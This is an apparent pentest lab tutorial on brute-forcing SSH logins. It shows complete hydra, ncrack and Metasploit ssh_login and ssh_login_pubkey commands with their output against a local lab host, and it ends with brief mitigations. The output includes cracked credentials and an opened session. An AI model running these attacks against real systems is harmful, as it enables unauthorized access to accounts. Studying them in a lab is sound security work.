Bruteforce: mitre -> T1110
Bruteforce Is a technigue that uses trial-and-error to guess login credentials.
Tools
These are some of the tools that are used to bruteforce ssh credentials.
- hydra
- ncrack
- metasploit
hydra
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.
Syntax
hydra -L [userfile] -P [password_file] ssh://[target_ip]
bruteforcing ssh protocol with hydra
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(cyberkhalid㉿kali)-[~/pentest]
└─$ hydra -L user.txt -P pass.txt ssh://192.168.43.234
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-05 20:20:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 96 login tries (l:8/p:12), ~6 tries per task
[DATA] attacking ssh://192.168.43.234:22/
[22][ssh] host: 192.168.43.234 login: 'user1' password: 'user1'
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-05 20:20:59
Ncrack
Ncrack Is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
syntax
ncrack -U [userfile] -P [password_file] ssh://[target]
bruteforcing ssh protocol with ncrack
1
2
3
4
5
6
7
8
9
┌──(cyberkhalid㉿kali)-[~/pentest]
└─$ ncrack -U user.txt -P pass.txt ssh://192.168.43.234
Starting Ncrack 0.7 ( http://ncrack.org ) at 2022-06-05 20:29 EDT
Discovered credentials for ssh on 192.168.43.234 22/tcp:
192.168.43.234 22/tcp ssh: 'user1' 'user1'
Ncrack done: 1 service scanned in 21.01 seconds.
Metasploit
Metasploit Is an open source platform that supports vulnerability research, exploit development, and the creation of custom security tools.
bruteforcing ssh protocol with metasploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.43.234
rhost => 192.168.43.234
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /home/cyberkhalid/pentest/user.txt
user_file => /home/cyberkhalid/pentest/user.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/cyberkhalid/pentest/pass.txt
pass_file => /home/cyberkhalid/pentest/pass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > exploit
[*] 192.168.43.234:22 - Starting bruteforce
[+] 192.168.43.234:22 - Success: 'user1:user1' 'uid=1000(user1) gid=1000(user1) groups=1000(user1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),134(sambashare) Linux user1-VirtualBox 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 2 opened (192.168.43.1:41713 -> 192.168.43.234:22) at 2022-06-05 20:40:02 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Using private keys
bruteforcing ssh protocol with metasploit using ssh-private keys
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > options
Module options (auxiliary/scanner/ssh/ssh_login_pubkey):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_USERS false no Add all users in the current database to the list
KEY_PASS no Passphrase for SSH private key(s)
KEY_PATH no Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" wi
ll be skipped. Duplicate private keys will be ignored.
PRIVATE_KEY /home/cyberkhalid/pentest/id no The string value of the private key that will be used. If you are using MSFConsole, this value should b
e set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.
RHOSTS 192.168.43.234 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME user1 no A specific username to authenticate as
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path /home/cyberkhalid/pentest/id
key_path => /home/cyberkhalid/pentest/id
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_pass Passsword@123
key_pass => Passsword@123
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > exploit
[*] 192.168.43.234:22 SSH - Testing Cleartext Keys
[*] 192.168.43.234:22 - Testing 1 key from /home/cyberkhalid/pentest/id
[+] 192.168.43.234:22 - Success: 'user1:-----BEGIN RSA PRIVATE KEY-----
Mitigations
- Enforce password policies.
- Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed.
- Use multi-factor authentication.